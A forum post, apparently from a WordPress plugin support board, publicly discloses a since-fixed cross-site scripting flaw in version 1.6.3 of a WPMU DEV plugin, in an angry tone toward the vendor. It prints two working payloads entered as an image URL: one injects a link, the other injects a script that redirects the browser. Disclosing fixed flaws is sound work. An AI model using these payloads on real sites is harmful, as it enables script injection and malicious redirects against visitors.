XSS vulnerability in 1.6.3
-
Since this has been fixed i’ll publish here the report i sent to WPMU DEV so everyone can see it and choose if they want to keep using WPMU DEV’s plugins.
I was going to post this in www.remarpro.com support forum, but i don’t want to f**k your users because of your incompetence. I’ll give you 24 hours to update your plugin before full disclosure.
Just another bug in your code, and this is a big one.
Enter one of the URLs below as the image URL, click the preview button and enjoy your XSS:
https://thisisnotamalicious.url"><a href=https://google.com>Click this innocent link! I swear it is safe!</a> <!--
Or just redirect to a malicious page without user interaction (change 7 to 8 if you are using https):
https://thisisnotamalicious.url"><script>var x = String(/google.com/);x = x.substring(1, x.length-1);y = location.href;window.location.replace(y.substring(0, 7) + x)</script>
Nice job, WPMU DEV. How many years with a XSS vulnerability?
This vulnerability allowed an attacker to execute arbitrary code in the client’s browser just by using an URL similar to the ones i described above. This is a very basic but very dangerous attack and it should have been fixed several years ago.
I guess this vulnerability affects every single version from 1.6.3 to the first one, but i only tested it in 1.6.3.
UPDATE NOW!
- The topic ‘XSS vulnerability in 1.6.3’ is closed to new replies.